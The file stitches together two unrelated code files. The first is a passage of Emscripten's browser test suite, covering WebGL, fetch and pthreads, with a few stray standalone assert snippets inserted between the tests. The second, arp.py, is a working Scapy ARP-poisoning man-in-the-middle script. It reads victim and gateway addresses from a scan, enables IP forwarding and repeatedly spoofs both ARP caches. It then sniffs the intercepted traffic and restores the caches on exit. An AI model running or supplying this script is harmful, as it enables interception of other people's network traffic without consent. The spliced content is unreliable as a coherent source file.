self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see #7374')
@requires_threads
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@no_chrome('see #7374')
@requires_threads
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@no_chrome('see #7374')
@requires_threads
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for args in [[], ['-DTEST_OFFSCREEN_CANVAS=1'], ['-DTEST_OFFSCREEN_CANVAS=2']]:
cmd = args + ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
cmd = args1 + args2 + ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that a shell html page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
@no_chrome('depends on moz-chunked-arraybuffer')
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file and stream it in with emscripten_fetch(),
# verifying that the data arrives in chunks rather than needing to be fully
# resident in the heap at once.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
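# Size arithmetic for the construction above, as a standalone check: the seed
# is 8 bytes, doubles 14 times, and is then written 1024 times.
_chunk = 8 * 2 ** 14
assert _chunk == 131072 # 128KB, matching the comment inside the loop
assert _chunk * 1024 == 134217728 # a 128MB file in total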
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args, timeout=30)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
run_process([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that the base64 utilities work in a browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
run_process([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
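# Context for the atob-disabling trick above (standalone sketch): with
# -s SINGLE_FILE=1 the binary artifacts are embedded as base64 data URIs, so
# nulling out atob forces the JS-side base64 decoder fallback to be exercised.
import base64
_payload = b"\x00asm\x01\x00\x00\x00" # an illustrative 8-byte wasm header
_uri = "data:application/octet-stream;base64," + base64.b64encode(_payload).decode("ascii")
assert base64.b64decode(_uri.split(",", 1)[1]) == _payload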
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"])
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
run_process([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
run_process([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that Emscripten-compiled applications can be run from a relative path in the browser that differs from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write(src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
run_process([PYTHON, EMCC, 'test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write('''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but additionally we
# eval the initial code, so currentScript is not present. That prevents us from
# finding the file in a subdir; here we at least check that we do not regress
# compared to the normal case of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
run_process([PYTHON, EMCC, 'test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
|
arp.py | from scapy.all import *
import sys
import os
import time
import sniff as capture
import threading
interface = sys.argv[1] # usage: python arp.py <interface>
os.system("python nmap_ping.py " + interface) # expected to write "IP -- MAC" lines to result_ping.txt
with open('result_ping.txt', 'r') as myfile:
victimsLines = myfile.readlines()
for victimLine in victimsLines:
victim_ip = victimLine.split(' -- ')[0]
victim_mac = victimLine.split(' -- ')[1].strip() # readlines() keeps the trailing newline
#print (victim_mac)
# Note: after the loop, victim_ip and victim_mac hold the last host listed.
with open('result_ping.txt', 'r') as file:
lines = file.readlines() # renamed from "list" to avoid shadowing the built-in
router_specs = ".1 --" # heuristic: the gateway is assumed to be the .1 host
list_router = [ip_mac for ip_mac in lines if router_specs in ip_mac]
for router in list_router:
router_ip = router.split(" -- ")[0]
router_mac = router.split(" -- ")[1].strip() # readlines() keeps the trailing newline
print (router_ip)
print (router_mac)
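# The parsing above assumes each line of result_ping.txt has the form
# "IP -- MAC" (inferred from the split(' -- ') calls; nmap_ping.py itself is
# not shown here). A self-contained illustration:
_example = "192.168.1.1 -- aa:bb:cc:dd:ee:ff\n"
assert _example.split(" -- ")[0] == "192.168.1.1"
assert _example.split(" -- ")[1].strip() == "aa:bb:cc:dd:ee:ff"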
print ("\n[*] Enabling IP Forwarding...\n")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
def reARP():
# Broadcast the correct IP-to-MAC mappings so both ARP caches recover.
print ("\n[*] Restoring Targets...")
send(ARP(op = 2, pdst = router_ip, psrc = victim_ip, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victim_mac), count = 7)
send(ARP(op = 2, pdst = victim_ip, psrc = router_ip, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = router_mac), count = 7)
print ("[*] Disabling IP Forwarding...")
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print ("[*] Shutting Down...")
sys.exit(1)
def trick(gm, vm):
# Continuously re-poison both ARP caches; gm is the gateway MAC, vm the victim MAC.
while 1:
conf.verb = 0
send(ARP(op = 2, pdst = victim_ip, psrc = router_ip, hwdst= vm))
send(ARP(op = 2, pdst = router_ip, psrc = victim_ip, hwdst= gm))
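# What the send() calls in trick() construct (standalone sketch; ARP comes from
# the scapy star-import at the top, and the addresses below are placeholders):
# op=2 is an ARP "is-at" reply, and scapy fills hwsrc with the local interface
# MAC by default, so each side learns that the other side's IP "is at" this
# host's MAC.
_pkt = ARP(op = 2, pdst = "192.168.1.7", psrc = "192.168.1.1", hwdst = "aa:bb:cc:dd:ee:ff")
assert _pkt.op == 2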
def mitm():
try:
victim_mac
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print ("[!] Couldn't Find Victim MAC Address")
print ("[!] Exiting...")
sys.exit(1)
try:
router_mac
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print ("[!] Couldn't Find Gateway MAC Address")
print ("[!] Exiting...")
sys.exit(1)
print ("[*] Poisoning Targets...")
poison_thread = threading.Thread(target=trick, args=(router_mac, victim_mac))
poison_thread.start()
try: #trick(router_mac, victim_mac)
time.sleep(1.5)
#sniff(prn=get_url.process_tcp_packet)
sniff(iface=interface, prn=capture.check_pkt, store=0)
#sniff(iface=interface, prn=captures.processPacket, store=0)
except KeyboardInterrupt:
reARP()
mitm()
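# Usage note (the interface name below is only an example): the script takes
# the capture interface as its sole argument and must run as root, e.g.
# sudo python arp.py eth0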
|